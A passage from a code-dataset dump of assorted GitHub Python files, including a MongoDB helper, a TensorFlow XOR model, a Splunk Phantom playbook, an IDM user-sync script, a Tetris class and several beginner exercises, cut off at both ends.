ok\")\n\n self.isOperable = True\n except Exception as e:\n logging.fatal(\"Connection to mongo failed (\" + str(e) + \")\")\n self.isOperable = False\n return\n\n def get_position(self):\n return self.db['settings'].find_one(self.position_selector)['value']\n\n def update_position(self, position):\n up = {\n '$set': {\n 'value': position\n }\n }\n\n self.db['settings'].update_one(self.position_selector, up)\n return\n\n def insert_user(self, user):\n if not self.isOperable:\n logging.error(\"Trying insert user in non-valid db!\")\n return False\n\n photo_id = None\n\n if (user.photo is not None) and (len(user.photo) > 0):\n photo_id = self.fs.put(user.photo, filename=str(user.sdo_id) + \".png\")\n\n o = Object()\n o.first_name = user.first_name\n o.last_name = user.last_name\n o.sdo_id = user.sdo_id\n o.photo_grid_fs_id = photo_id\n\n insert_id = self.db['users'].insert_one(o.__dict__).inserted_id\n\n logging.info(\"User [\" + str(o.sdo_id) + \"] inserted with key: \" + str(insert_id))\n return True\n","repo_name":"Holovin/VS_SdoPhotoParser","sub_path":"database.py","file_name":"database.py","file_ext":"py","file_size_in_byte":1877,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"23957663882","text":"#!/usr/bin/env python3\r\n\r\ndef string_two_numbers_spliter():\r\n x, y = [int(i) for i in input().split()]\r\n return x, y\r\n\r\n\r\ndef swap_two_numbers_asc(x, y):\r\n x, y = y, x\r\n return x, y\r\n\r\n\r\ndef main():\r\n while True:\r\n x, y = string_two_numbers_spliter()\r\n if x == 0 and y == 0:\r\n break\r\n if x > y:\r\n x, y = swap_two_numbers_asc(x, y)\r\n print('%d %d' % (x, y))\r\n\r\n\r\nif __name__ == '__main__':\r\n main()\r\n\r\n\r\n# NOTE AOJ question URL (Repetitive Processing - Swapping Two Numbers?):\r\n# http://judge.u-aizu.ac.jp/onlinejudge/description.jsp?id=ITP1_3_C\r\n\r\n# NOTE Web pages inspired me to sove this question:\r\n# Is there a standardized method to swap two variables in Python?:\r\n# http://stackoverflow.com/q/14836228/1334728\r\n","repo_name":"shoichiaizawa/aoj_python3","sub_path":"itp1/03c_swapping_two_numbers.py","file_name":"03c_swapping_two_numbers.py","file_ext":"py","file_size_in_byte":784,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"3222492752","text":"import matplotlib.pyplot as plt\nimport tensorflow as tf\nimport numpy as np\nimport numpy.random as rd\nimport time\n\nsave_pth = './models/xor_model.ckpt'\n\nn_hidd = 2\nn_in = 2\nlearning_rate = 0.1\n\n# training data and labels\nX = np.array([[0., 0.], [0., 1.], [1., 0.], [1., 1.]])\nY = np.array([[0.], [1.], [1.], [0.]])\n\n\nw1 = tf.Variable(tf.random_uniform([n_in, n_hidd], -1, 1), trainable=True)\nb1 = tf.Variable(tf.zeros(n_hidd))\nw2 = tf.Variable(tf.random_uniform([n_hidd, 1], -1, 1), trainable=True)\nb2 = tf.Variable(tf.zeros(1))\n\nx = tf.placeholder(shape=(None, X.shape[1]), dtype=tf.float32)\nz = tf.matmul(x, w1) + b1\na = tf.nn.relu(z)\n\ny = tf.nn.sigmoid(tf.matmul(a, w2) + b2)\nz_ = tf.placeholder(shape=(None, 1), dtype=tf.float32)\n\ncost = tf.reduce_mean(((z_ * tf.log(y)) + ((1 - z_) * tf.log(1.0 - y))) * -1)\ntrain_step = tf.train.GradientDescentOptimizer(learning_rate).minimize(cost)\n\ncorrect_prediction = tf.equal(tf.argmax(y,1), tf.argmax(z_,1))\n#accuracy = tf.reduce_mean(tf.cast(correct_prediction))\n\ninit = tf.global_variables_initializer()\n\nsaver = tf.train.Saver()\nsess = tf.Session()\nsess.run(init)\n\nfor i in range(5000):\n 
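A correctness note on the XOR script: with a single sigmoid output unit, `tf.argmax(y, 1)` is always 0 for both `y` and `z_`, so the equality check is vacuously true and the reported accuracy is meaningless. A sketch of a threshold-based check in the same TF1 graph style, assuming the `y` and `z_` tensors defined above:

```python
# Hypothetical fix, assuming the 1-unit sigmoid output `y` and the label
# placeholder `z_` from the script above (import tensorflow as tf).
prediction = tf.cast(tf.greater(y, 0.5), tf.float32)  # 0/1 decision per sample
correct_prediction = tf.equal(prediction, z_)         # elementwise comparison
accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))
```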
sess.run(train_step, feed_dict={x: X, z_: Y})\n\n loss = sess.run(cost, feed_dict={x: X, z_: Y})\n #acc = sess.run(accuracy, feed_dict={x: X, z_: Y})\n\n if i%1000 == 0:\n print('Iteration : {}, loss : {:.3f}'.format(i, loss))\n\nsaver.save(sess, save_pth)\n\n# test data and test labels\nX_test = np.array([[1., 1.], [0., 0.], [1., 0.], [1., 1.], [1., 0], [0., 1.], [0., 0.], [0., 1.], [0., 1.], [1., 1.], [1., 0.]])\nY_test = np.array([[0.], [0.], [1.], [0.], [1.], [1.] , [0.], [1.], [1.], [0.], [1.]], dtype=np.float32)\n\ncorrect_prediction = tf.equal(tf.argmax(y,1), tf.argmax(z_,1))\naccuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))\n\nacc = sess.run(accuracy, feed_dict={x: X_test, z_: Y_test})\nprint('Acc = {:.3f}%'.format(acc*100))\n\n","repo_name":"enizimus/XOR_nn","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1900,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"22392215536","text":"\"\"\"\n\n\"\"\"\n\n\nimport phantom.rules as phantom\nimport json\nfrom datetime import datetime, timedelta\n\n\ndef on_start(container):\n phantom.debug('on_start() called')\n\n # call 'string_to_uppercase_1' block\n string_to_uppercase_1(container=container)\n\n return\n\ndef format_1(action=None, success=None, container=None, results=None, handle=None, filtered_artifacts=None, filtered_results=None, custom_function=None, **kwargs):\n phantom.debug(\"format_1() called\")\n\n template = \"\"\"find_peers server=\\\"{0}\\\"\\n\"\"\"\n\n # parameter list for template variable replacement\n parameters = [\n \"string_to_uppercase_1:custom_function_result.data.uppercase_string\"\n ]\n\n ################################################################################\n ## Custom Code Start\n ################################################################################\n\n # Write your custom code here...\n\n ################################################################################\n ## Custom Code End\n ################################################################################\n\n phantom.format(container=container, template=template, parameters=parameters, name=\"format_1\")\n\n run_query_1(container=container)\n\n return\n\n\ndef string_to_uppercase_1(action=None, success=None, container=None, results=None, handle=None, filtered_artifacts=None, filtered_results=None, custom_function=None, **kwargs):\n phantom.debug(\"string_to_uppercase_1() called\")\n\n container_artifact_data = phantom.collect2(container=container, datapath=[\"artifact:*.cef.destination\",\"artifact:*.id\"])\n\n parameters = []\n\n # build parameters list for 'string_to_uppercase_1' call\n for container_artifact_item in container_artifact_data:\n parameters.append({\n \"input_string\": container_artifact_item[0],\n })\n\n ################################################################################\n ## Custom Code Start\n ################################################################################\n\n # Write your custom code here...\n\n ################################################################################\n ## Custom Code End\n ################################################################################\n\n phantom.custom_function(custom_function=\"community/string_to_uppercase\", parameters=parameters, name=\"string_to_uppercase_1\", callback=format_1)\n\n return\n\n\ndef run_query_1(action=None, success=None, container=None, results=None, handle=None, filtered_artifacts=None, 
filtered_results=None, custom_function=None, **kwargs):\n phantom.debug(\"run_query_1() called\")\n\n # phantom.debug('Action: {0} {1}'.format(action['name'], ('SUCCEEDED' if success else 'FAILED')))\n\n format_1 = phantom.get_format_data(name=\"format_1\")\n\n parameters = []\n\n if format_1 is not None:\n parameters.append({\n \"query\": format_1,\n \"command\": \"savedsearch\",\n })\n\n ################################################################################\n ## Custom Code Start\n ################################################################################\n\n # Write your custom code here...\n\n ################################################################################\n ## Custom Code End\n ################################################################################\n\n phantom.act(\"run query\", parameters=parameters, name=\"run_query_1\", assets=[\"esabwrev\"], callback=run_query_1_callback)\n\n return\n\n\ndef run_query_1_callback(action=None, success=None, container=None, results=None, handle=None, filtered_artifacts=None, filtered_results=None, custom_function=None, **kwargs):\n phantom.debug(\"run_query_1_callback() called\")\n\n \n prompt_1(action=action, success=success, container=container, results=results, handle=handle, filtered_artifacts=filtered_artifacts, filtered_results=filtered_results)\n l5_cf_get_query_results_py3_4(action=action, success=success, container=container, results=results, handle=handle, filtered_artifacts=filtered_artifacts, filtered_results=filtered_results)\n\n\n return\n\n\ndef prompt_1(action=None, success=None, container=None, results=None, handle=None, filtered_artifacts=None, filtered_results=None, custom_function=None, **kwargs):\n phantom.debug(\"prompt_1() called\")\n\n # set user and message variables for phantom.prompt call\n\n user = \"admin\"\n message = \"\"\"here's the list\\n\\n{0} priority: {1} count:{2}\"\"\"\n\n # parameter list for template variable replacement\n parameters = [\n \"run_query_1:action_result.data.*.peer\",\n \"run_query_1:action_result.data.*.priority\",\n \"run_query_1:action_result.data.*.count\"\n ]\n\n # responses\n response_types = [\n {\n \"prompt\": \"Update event?\",\n \"options\": {\n \"type\": \"list\",\n \"choices\": [\n \"Yes\",\n \"No\"\n ],\n },\n },\n {\n \"prompt\": \"comment:\",\n \"options\": {\n \"type\": \"message\",\n },\n }\n ]\n\n phantom.prompt2(container=container, user=user, message=message, respond_in_mins=30, name=\"prompt_1\", parameters=parameters, response_types=response_types, callback=decision_1)\n\n return\n\n\ndef decision_1(action=None, success=None, container=None, results=None, handle=None, filtered_artifacts=None, filtered_results=None, custom_function=None, **kwargs):\n phantom.debug(\"decision_1() called\")\n\n # check for 'if' condition 1\n found_match_1 = phantom.decision(\n container=container,\n conditions=[\n [\"prompt_1:action_result.summary.responses.0\", \"==\", \"Yes\"]\n ])\n\n # call connected blocks if condition 1 matched\n if found_match_1:\n update_event_1(action=action, success=success, container=container, results=results, handle=handle)\n return\n\n return\n\n\ndef update_event_1(action=None, success=None, container=None, results=None, handle=None, filtered_artifacts=None, filtered_results=None, custom_function=None, **kwargs):\n phantom.debug(\"update_event_1() called\")\n\n # phantom.debug('Action: {0} {1}'.format(action['name'], ('SUCCEEDED' if success else 'FAILED')))\n\n prompt_1_result_data = phantom.collect2(container=container, 
datapath=[\"prompt_1:action_result.summary.responses.1\",\"prompt_1:action_result.parameter.context.artifact_id\"], action_results=results)\n container_artifact_data = phantom.collect2(container=container, datapath=[\"artifact:*.cef.notable_id\",\"artifact:*.id\"])\n\n parameters = []\n\n # build parameters list for 'update_event_1' call\n for prompt_1_result_item in prompt_1_result_data:\n for container_artifact_item in container_artifact_data:\n if container_artifact_item[0] is not None:\n parameters.append({\n \"status\": \"in progress\",\n \"comment\": prompt_1_result_item[0],\n \"urgency\": \"critical\",\n \"event_ids\": container_artifact_item[0],\n \"context\": {'artifact_id': container_artifact_item[1]},\n })\n\n ################################################################################\n ## Custom Code Start\n ################################################################################\n\n # Write your custom code here...\n\n ################################################################################\n ## Custom Code End\n ################################################################################\n\n phantom.act(\"update event\", parameters=parameters, name=\"update_event_1\", assets=[\"esabwrev\"])\n\n return\n\n\ndef playbook_create_events_1(action=None, success=None, container=None, results=None, handle=None, filtered_artifacts=None, filtered_results=None, custom_function=None, **kwargs):\n phantom.debug(\"playbook_create_events_1() called\")\n\n l5_cf_get_query_results_py3_4__result = phantom.collect2(container=container, datapath=[\"l5_cf_get_query_results_py3_4:custom_function_result.data.results_list\"])\n\n l5_cf_get_query_results_py3_4_data_results_list = [item[0] for item in l5_cf_get_query_results_py3_4__result]\n\n inputs = {\n \"mylist\": l5_cf_get_query_results_py3_4_data_results_list,\n }\n\n ################################################################################\n ## Custom Code Start\n ################################################################################\n\n # Write your custom code here...\n\n ################################################################################\n ## Custom Code End\n ################################################################################\n\n # call playbook \"chris/create events\", returns the playbook_run_id\n playbook_run_id = phantom.playbook(\"chris/create events\", container=container, inputs=inputs)\n\n return\n\n\ndef l5_cf_get_query_results_py3_4(action=None, success=None, container=None, results=None, handle=None, filtered_artifacts=None, filtered_results=None, custom_function=None, **kwargs):\n phantom.debug(\"l5_cf_get_query_results_py3_4() called\")\n\n id_value = container.get(\"id\", None)\n run_query_1_result_data = phantom.collect2(container=container, datapath=[\"run_query_1:action_result.data.*.peer\",\"run_query_1:action_result.data.*.priority\",\"run_query_1:action_result.data.*.count\",\"run_query_1:action_result.parameter.context.artifact_id\"], action_results=results)\n\n run_query_1_result_item_0 = [item[0] for item in run_query_1_result_data]\n run_query_1_result_item_1 = [item[1] for item in run_query_1_result_data]\n run_query_1_result_item_2 = [item[2] for item in run_query_1_result_data]\n\n parameters = []\n\n parameters.append({\n \"peer\": run_query_1_result_item_0,\n \"priority\": run_query_1_result_item_1,\n \"count\": run_query_1_result_item_2,\n \"container\": id_value,\n })\n\n 
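`phantom.collect2` returns rows of datapath tuples, and each block above unpacks them positionally while building its `parameters` list. A compact sketch of that unpack-and-filter step for `update_event_1`; the helper name is illustrative and the datapaths are the ones already used above:

```python
def build_update_params(prompt_rows, artifact_rows):
    # Hypothetical refactor of the nested loops in update_event_1: pair each
    # prompt response with every artifact that actually carries a notable_id.
    params = []
    for comment, _ctx in prompt_rows:
        for notable_id, artifact_id in artifact_rows:
            if notable_id is None:
                continue
            params.append({
                "status": "in progress",
                "comment": comment,
                "urgency": "critical",
                "event_ids": notable_id,
                "context": {"artifact_id": artifact_id},
            })
    return params
```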
################################################################################\n ## Custom Code Start\n ################################################################################\n\n # Write your custom code here...\n\n ################################################################################\n ## Custom Code End\n ################################################################################\n\n phantom.custom_function(custom_function=\"chris/L5_CF_Get_Query_Results_py3\", parameters=parameters, name=\"l5_cf_get_query_results_py3_4\", callback=playbook_create_events_1)\n\n return\n\n\ndef on_finish(container, summary):\n phantom.debug(\"on_finish() called\")\n\n ################################################################################\n ## Custom Code Start\n ################################################################################\n\n # This function is called after all actions are completed.\n # summary of all the action and/or all details of actions\n # can be collected here.\n\n # summary_json = phantom.get_summary()\n # if 'result' in summary_json:\n # for action_result in summary_json['result']:\n # if 'action_run_id' in action_result:\n # action_results = phantom.get_action_results(action_run_id=action_result['action_run_id'], result_data=False, flatten=False)\n # phantom.debug(action_results)\n\n ################################################################################\n ## Custom Code End\n ################################################################################\n\n return","repo_name":"kshish/PhantomAdvancedImplementation","sub_path":"send to splunk.py","file_name":"send to splunk.py","file_ext":"py","file_size_in_byte":11601,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"75"} +{"seq_id":"8200695519","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nfrom zeep import Client\nfrom overview.models import UserExpire\nfrom django.db.models import Max\nfrom datetime import datetime\nimport xml.etree.ElementTree as Et\nfrom data.common import MysqlOper\n\n\ndef inc_tempuser():\n dbconn = MysqlOper()\n\n CURRENT_DATE = datetime.today()\n timestr = datetime.today().strftime('%Y%m%d%H%M%S%f')[:-3]\n idmid = 'AD_SUNAC_300_' + timestr\n\n WSDL_URL = \"http://esb.sunac.com.cn:8002/WP_SUNAC/APP_PUBLIC_SERVICES/Proxy_Services/TA_IDM\" \\\n \"/PUBLIC_SUNAC_300_queryIdmUserData_PS?wsdl\"\n SYSTEMID = 'Sunac_ADLS_USR'\n NUM = 1\n NUM_LOOP = 'YES'\n\n object_max_dbtime = UserExpire.objects.aggregate(Max('updatetime'))\n begintime = datetime.strftime(object_max_dbtime['updatetime__max'], '%Y-%m-%d %H:%M:%S.%f')\n\n while NUM <= 999 and NUM_LOOP == 'YES':\n client = Client(wsdl=WSDL_URL)\n querydto_type = client.get_type('ns0:queryDto')\n header_type = client.get_type('ns2:Header')\n querydto = querydto_type(beginDate=begintime, endDate=CURRENT_DATE,\n pageNo=NUM, pageRowNo='100', systemID=SYSTEMID)\n header = header_type(BIZTRANSACTIONID=idmid, COUNT='', CONSUMER='',\n SRVLEVEL='', ACCOUNT='idmadmin', PASSWORD='idmpass')\n residmquery = client.service.PUBLIC_SUNAC_300_queryIdmUserData(queryDto=querydto,\n _soapheaders={'parameters2': header})\n\n if residmquery['body']['HEADER']['RESULT'] == '0':\n user_list_old = residmquery['body']['LIST']\n user_list = user_list_old.replace(\"&\", \"及\")\n xml_tree = Et.fromstring(user_list)\n if len(xml_tree) > 0:\n l_userinfo = []\n for userinfo in xml_tree.iter('USER'):\n userid = userinfo.find('UserLogin').text\n username = userinfo.find('Username').text\n 
company = userinfo.find('UserAddress').text\n phone = userinfo.find('Mobile').text\n email = userinfo.find('Email').text\n state = userinfo.find('UserStatus').text\n expiretime = userinfo.find('UserExpiryDate').text\n updatetime = userinfo.find('UserUpdate').text\n createtime = userinfo.find('UserCreate').text\n usertype = userinfo.find('UserEmpType').text\n t_userobj = (userid, username, company, phone, email, state, expiretime, updatetime, createtime,\n usertype)\n l_userinfo.append(t_userobj)\n dbconn.dbmanyinsert('replace into overview_userexpire (userid,username,company,phone,email,state,'\n 'expiretime,updatetime,createtime,usertype) '\n 'values (%s,%s,%s,%s,%s,%s,%s,%s,%s,%s)',\n l_userinfo)\n\n if len(xml_tree) == 100:\n NUM += 1\n else:\n NUM_LOOP = 'NO'\n else:\n NUM_LOOP = 'NO'\n else:\n NUM_LOOP = 'NO'\n\n dbconn.dbclose()\n","repo_name":"huyu16/SunacProject","sub_path":"itportal/data/idm.py","file_name":"idm.py","file_ext":"py","file_size_in_byte":3273,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"26172055590","text":"import random\nfrom settings import *\nfrom block import Block\nfrom gamewall import Wall\nimport pygame\n\n\nclass GameState:\n def __init__(self, screen):\n self.screen = screen\n self.wall = Wall(screen)\n self.block = None\n self.next_block = None\n self.timer_interval = TIMER_INTERVAL\n # self.set_timer(self.timer_interval)\n self.game_score = 0\n self.stopped = True\n self.paused = False\n self.play_times = 0\n self.level = 1\n\n def set_timer(self, timer_interval):\n pygame.time.set_timer(pygame.USEREVENT, timer_interval)\n\n def stop_timer(self):\n pygame.time.set_timer(pygame.USEREVENT, 0) # clear timer\n\n def add_score(self, score):\n self.game_score += score\n level = self.game_score // LEVEL_RANGE + 1\n if level > self.level:\n self.level += 1\n if self.timer_interval >= 500:\n self.timer_interval -= 50\n elif 200 <= self.timer_interval < 500:\n self.timer_interval -= 30\n elif 100 <= self.timer_interval < 200:\n self.timer_interval -= 20\n elif 0 < self.timer_interval < 100:\n self.timer_interval -= 10\n pygame.time.set_timer(pygame.USEREVENT, self.timer_interval)\n\n def start_game(self):\n self.stopped = False\n self.set_timer(TIMER_INTERVAL)\n self.timer_interval = TIMER_INTERVAL\n self.block = self.new_block()\n self.block = self.new_block()\n self.play_times += 1\n self.wall.clear()\n self.game_score = 0\n self.paused = False\n # random.seed(int(time.time()))\n\n def new_block(self):\n self.block = self.next_block\n a = random.choice(BLOCK_TYPES)\n self.next_block = Block(a, random.randint(0, len(BLOCK[a]) - 1), self.screen, self.wall)\n\n return self.block\n\n def pause_game(self):\n self.stop_timer()\n self.paused = True\n\n def resume_game(self):\n self.set_timer(self.timer_interval)\n self.paused = False\n\n def touch_bottom(self):\n self.wall.add_to_wall(self.block)\n self.add_score(self.wall.eliminate_line())\n for c in range(COLUMN_NUM):\n if self.wall.is_wall(0, c): # game over\n self.stopped = True\n break\n if not self.stopped:\n self.block = self.new_block()\n if self.block.hit_wall():\n self.stopped = True\n if self.stopped:\n self.stop_timer()\n","repo_name":"tonyqtang/ee551project","sub_path":"gamestate.py","file_name":"gamestate.py","file_ext":"py","file_size_in_byte":2548,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"40116741363","text":"# 
Two integers separated by a space and a string are given as input. Convert the substring within the range of the two integers to uppercase and print it.\n\na, b = map(int, input().split())\ns = input()\n\ncount = 0\nstr = []\nfor i in s:\n    count += 1\n    if count > a-1 and count < b+1:\n        str.append(i.upper())\n    else:\n        str.append(i)\n\nprint(\"\".join(str))","repo_name":"kanp7/paiza","sub_path":"Python/rankB_Up/CapitalizeOnlyTheSpecifiedRange/Final.py","file_name":"Final.py","file_ext":"py","file_size_in_byte":381,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"}
+{"seq_id":"40297888655","text":"def sorting():\n    sorted_list = []\n    while True:\n        sorted_list.append(min(numbers))\n        numbers.remove(min(numbers))\n        if len(numbers) == 0:\n            break\n    print('sorted list')\n    print(sorted_list)\n\nnum = input('enter a sequence of number, separated by space: ')\n\n#strip: cut spaces at start/end of string\nlist_num = num.strip().split()\n\nnumbers = []\n\nfor item in list_num:\n    numbers.append(int(item))\nprint(numbers)\n\nis_sorted = True\nfor i in range(len(numbers) - 1):\n    if numbers[i] > numbers[i + 1]:\n        is_sorted = False\n        break\nif is_sorted:\n    print('your list is already sorted')\nelse:\n    print('your list is not sorted')\n    sorting()\n","repo_name":"minhduc9699/PhamMinhDuc-fundamental-c4e16","sub_path":"S4/input_numbers.py","file_name":"input_numbers.py","file_ext":"py","file_size_in_byte":687,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"}
+{"seq_id":"71495935602","text":"#!/usr/bin/python3\n\"\"\"Defining class\"\"\"\n\n\nclass Square:\n    \"\"\"a square class\"\"\"\n\n    def __init__(self, size=0):\n        \"\"\"Initialize a new square.\n        Args:\n            size (int): The size of the new square.\n        \"\"\"\n        if not isinstance(size, int):\n            raise TypeError(\"size must be an integer\")\n        elif size < 0:\n            raise ValueError(\"size must be >= 0\")\n        self.__size = size\n\n    def area(self):\n        \"\"\"Returns area of a square\"\"\"\n        return self.__size**2\n\n    @property\n    def size(self):\n        \"\"\"getter function\"\"\"\n        return self.__size\n\n    @size.setter\n    def size(self, value):\n        \"\"\"setter function\n        Args:\n            value(int): takes in the size field\n        \"\"\"\n        if not isinstance(value, int):\n            raise TypeError(\"size must be an integer\")\n        elif value < 0:\n            raise ValueError(\"size must be >= 0\")\n        self.__size = value\n\n    def my_print(self):\n        \"\"\"prints the square\"\"\"\n        if self.size != 0:\n            for i in range(0, self.size):\n                print(\"#\" * self.size)\n        else:\n            print()\n","repo_name":"Omoseke-code/alx-higher_level_programming","sub_path":"0x06-python-classes/5-square.py","file_name":"5-square.py","file_ext":"py","file_size_in_byte":1145,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"}
+{"seq_id":"38247309569","text":"# Math/Is it consecutive?
/Silver 5\n\nk = int(input())\na, b, c, d = list(map(int, input().split()))\ntmp1, tmp2 = a*k+b, c*k+d\n\nif tmp1 == tmp2:\n    print(\"Yes\",tmp1)\nelse:\n    print(\"No\")\n","repo_name":"coolOlive/TIL","sub_path":"코딩테스트 공부/230819_백준[26517].py","file_name":"230819_백준[26517].py","file_ext":"py","file_size_in_byte":180,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"}
+{"seq_id":"13147845083","text":"from django.test import TestCase\nfrom .models import Product, Category\n\n\nclass TestProductsModels(TestCase):\n    \"\"\" tests for the product model \"\"\"\n    def setUp(self):\n        self.category1 = Category.objects.create(\n            name='tin_food',\n            friendly_name='Canned Food'\n        )\n        self.category2 = Category.objects.create(\n            name='dry_food',\n            friendly_name='Dry Food'\n        )\n        self.product1 = Product.objects.create(\n            name='Test 1234',\n            category=self.category1,\n            quantity_in_stock=5,\n            price=15.00,\n        )\n\n    def test_product_name(self):\n        product = self.product1\n        self.assertEqual(str(product), 'Test 1234')\n\n    def test_stock_label_change(self):\n        product = self.product1\n        product.quantity_in_stock = 0\n        self.assertEqual(product.in_stock, False)\n\n    def test_category_name(self):\n        category = self.category1\n        self.assertEqual(str(category), 'tin_food')\n\n    def test_category_name_to_display(self):\n        category = self.category1\n        friendly_name = category.get_friendly_name()\n        self.assertEqual(friendly_name, 'Canned Food')\n","repo_name":"ExcellentWish/fur-pet-store","sub_path":"products/test_models.py","file_name":"test_models.py","file_ext":"py","file_size_in_byte":1195,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"}
+{"seq_id":"41020627094","text":"import numpy as np\nimport os\nimport matplotlib as mpl\nimport matplotlib.pyplot as plt\nfrom graphviz import Source\nfrom sklearn.tree import export_graphviz\nfrom sklearn.datasets import load_iris\nfrom matplotlib.colors import ListedColormap\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.model_selection import train_test_split\nimport subprocess\n\nmpl.rc('axes', labelsize=14)\nmpl.rc('xtick', labelsize=12)\nmpl.rc('ytick', labelsize=12)\n\n# Figures settings\nPROJECT_ROOT_DIR = \".\"\nCHAPTER_ID = \"decision_trees\"\nIMAGES_PATH = os.path.join(PROJECT_ROOT_DIR, \"images\", CHAPTER_ID)\nos.makedirs(IMAGES_PATH, exist_ok=True)\n\n# Writing console output into a file.\nfnres = 'consoleResultsIris.txt'\nfres = open(fnres, 'w')\n\n\n# Function to create the png of the plots\ndef save_fig(fig_id, tight_layout=True, fig_extension=\"png\", resolution=300):\n    path = os.path.join(IMAGES_PATH, fig_id + \".\" + fig_extension)\n    print(\"Saving figure\", fig_id)\n    if tight_layout:\n        plt.tight_layout()\n    plt.savefig(path, format=fig_extension, dpi=resolution)\n\n\n# Function to make the plot of the decision boundary\ndef plot_decision_boundary(clf, X, y, axes=[0, 7.5, 0, 3], iris=True, legend=False,\n                           plot_training=True):\n    x1s = np.linspace(axes[0], axes[1], 100)\n    x2s = np.linspace(axes[2], axes[3], 100)\n    x1, x2 = np.meshgrid(x1s, x2s)\n    X_new = np.c_[x1.ravel(), x2.ravel()]\n    y_pred = clf.predict(X_new).reshape(x1.shape)\n    custom_cmap = ListedColormap(['#fafab0', '#9898ff', '#a0faa0'])\n    plt.contourf(x1, x2, y_pred, alpha=0.3, cmap=custom_cmap)\n    if not iris:\n        custom_cmap2 = ListedColormap(['#7d7d58', '#4c4c7f', '#507d50'])\n        plt.contour(x1, x2, y_pred, cmap=custom_cmap2, alpha=0.8)\n    if plot_training:\n        plt.plot(X[:, 0][y == 0], X[:, 1][y == 0], \"yo\", 
label=\"Iris setosa\")\n plt.plot(X[:, 0][y == 1], X[:, 1][y == 1],\n \"bs\", label=\"Iris versicolor\")\n plt.plot(X[:, 0][y == 2], X[:, 1][y == 2],\n \"g^\", label=\"Iris virginica\")\n plt.axis(axes)\n if iris:\n plt.xlabel(\"Petal length\", fontsize=14)\n plt.ylabel(\"Petal width\", fontsize=14)\n else:\n plt.xlabel(r\"$x_1$\", fontsize=18)\n plt.ylabel(r\"$x_2$\", fontsize=18, rotation=0)\n if legend:\n plt.legend(loc=\"lower right\", fontsize=14)\n\n\n# Load the iris dataset\niris = load_iris()\nX = iris.data[:, :2]\ny = iris.target\nx_train, x_test, y_train, y_test = train_test_split(\n X, y, test_size=0.2, train_size=0.8, random_state=1, shuffle=True)\ntree_clf = DecisionTreeClassifier(random_state=0)\n\n# Train the model\ntree_clf.fit(x_train, y_train)\n\n\n# Create the graphviz dot file for the wine dataset\nexport_graphviz(tree_clf, out_file=os.path.join(IMAGES_PATH, \"iris_tree.dot\"),\n feature_names=iris.feature_names[2:], class_names=iris.target_names, rounded=True, filled=True)\nSource.from_file(os.path.join(IMAGES_PATH, \"iris_tree.dot\"))\n\n# Create the tree png\ntreepng = \"iris_tree.png\"\ncmd = [\"dot\", \"-Tpng\", os.path.join(IMAGES_PATH, \"iris_tree.dot\"),\n \"-o\", os.path.join(IMAGES_PATH, treepng)]\np = subprocess.Popen(cmd)\n\n# Print results and write them to external file\nprint(\"==============TESTING IRIS DATASET===============\\n\")\nfres.write(\"==============TESTING IRIS DATASET===============\\n\")\ntestset_score = tree_clf.score(x_test, y_test)\nprint(\"The score obtained by the test sets is: {scr}\".format(\n scr=testset_score))\nfres.write(\"The score obtained by the test sets is: {scr}\\n\".format(\n scr=testset_score))\ntrainset_score = tree_clf.score(x_train, y_train)\nprint(\"The score obtained by the train sets is: {scr}\".format(\n scr=trainset_score))\nfres.write(\"The score obtained by the train sets is: {scr}\\n\".format(\n scr=trainset_score))\n\n# Plot the irises\nplt.figure(figsize=(8, 4))\nplot_decision_boundary(tree_clf, X, y)\nplt.plot([2.45, 2.45], [0, 3], \"k-\", linewidth=2)\nplt.plot([2.45, 7.5], [1.75, 1.75], \"k--\", linewidth=2)\nplt.text(1.40, 1.0, \"Depth=0\", fontsize=15)\nplt.text(3.2, 1.80, \"Depth=1\", fontsize=13)\nsave_fig(\"decision_tree_decision_boundaries_plot\")\nplt.show()\n\nfres.close()\n","repo_name":"dmtzt/machine-learning","sub_path":"practice5/practice5-iris.py","file_name":"practice5-iris.py","file_ext":"py","file_size_in_byte":4139,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"32589074799","text":"from matplotlib import pyplot as plt\nimport pandas as pd\nimport matplotlib.animation as animation\nfrom matplotlib import style\nimport subprocess\nimport sys\n\ndef draw_error (epoches, loss):\n plt.plot(epoches, loss)\n plt.xlabel(\"epoches\")\n plt.ylabel(\"loss\")\n plt.show()\n\ndef draw_error_animation (): \n style.use('fivethirtyeight')\n fig = plt.figure()\n global ax1 \n ax1 = fig.add_subplot(1,1,1)\n ani = animation.FuncAnimation(fig, animate, interval=1000)\n plt.show()\n\ndef animate(i):\n graph_data = open('example.txt','r+').read()\n lines = graph_data.split('\\n')\n xs = []\n ys = []\n for line in lines:\n if len(line) > 1:\n x, y = line.split(',')\n xs.append(float(x))\n ys.append(float(y))\n ax1.clear()\n ax1.plot(xs, ys)\n\nsubprocess.Popen([\"python\", \"test_mlp.py\"] + 
